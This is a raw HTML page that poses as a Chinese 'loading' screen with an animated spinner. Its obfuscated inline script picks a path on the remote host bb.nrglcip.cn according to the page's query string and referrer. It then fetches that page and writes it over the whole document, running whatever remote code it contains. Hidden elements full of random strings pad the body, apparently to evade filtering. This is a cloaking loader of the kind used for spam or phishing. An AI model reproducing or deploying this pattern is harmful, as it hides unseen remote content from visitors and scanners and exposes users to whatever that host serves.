<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vgYfPylf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vgYfPylf .vffuHRDfiM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vgYfPylf .content {
            line-height: 50px;
            text-align: center
        }

        .vgYfPylf .img {
            width: 100%
        }

        .vgYfPylf .ONWvJL {
            text-align: center
        }

        .vgYfPylf .ONWvJL span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vgYfPylf .ONWvJL span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vgYfPylf .ONWvJL span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vgYfPylf .ONWvJL span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vgYfPylf .ONWvJL span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vgYfPylf .ONWvJL span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vgYfPylf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XvFR8VndgM5(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Qt90iam = XvFR8VndgM5('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Qt90iam +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Qt90iam +".html?a=share";
		}
		
        DTvEqC9S9u=url+"#"+new Date().getTime();
        DTvEqC9S9u && function() {
            $.get(DTvEqC9S9u, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>oAw2cTUONN4DSIje2JvCrKPn4X8thmPeWWWdVICJqpsQN5vGx0owVRHxd1XwpDXB38Ab</p>
<ul style='display:none' >Wez6HwskfFWgkqnI3KZimqLLCkACn2vokBHt3LC</ul>
<a  href='#' style='display:none'>PqVYNbsx5x9setDmavDi48x51Z6HTUohQW2nhGlt2zuEIjABXgRCVtzPB2oefj4FiER8108cH1UQXiWGQtf36O6Qd4hy0GHREtTj</a>
<p  style='display:none'>oAw2cTUONN4DSIje2JvCrKPn4X8thmPeWWWdVICJqpsQN5vGx0owVRHxd1XwpDXB38Ab</p>
<div style='display:none'>lE6Guf4JlQnvyZzi18nBKSX7VAkBDhiDuRYUIE2huBpE8hDR300TUnuihjk0A43j</div>
<h1 style='display:none' >blxbVKtXKmhAs9dH85NAng0auPvc6Q9Q0ohAl28wdMXXnhP5hPssLISxfgRdvyz7npnnlk</h1>
<p  style='display:none'>oAw2cTUONN4DSIje2JvCrKPn4X8thmPeWWWdVICJqpsQN5vGx0owVRHxd1XwpDXB38Ab</p><div class="vgYfPylf">
    <div class="vffuHRDfiM">
        <div class="ONWvJL">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >XwG0Vf844asROtzWThQ0s0aVPauEVerVW2Pu</h1>
<div style='display:none'>p8HrJzw1id10dNV6QqdIv9TeyzeYoxV04LwamuaNcQ4G4xhgTkCGVJDeIFpocmEveyyEkpMIcKyzvAFhjwex8YPmNK</div>
<img  src='' style='display:none'>
<span style='display:none'>XXodxS156X6pWpP5zU3g20lxVSS5tkJ8IdtSXnEjh3YWhFZ9wPQNcN0seXmFrVz1a</span>
<li style='display:none' >G7fyPW8H3QNjWXRL3T5ROs73NR3</li></body>
</html>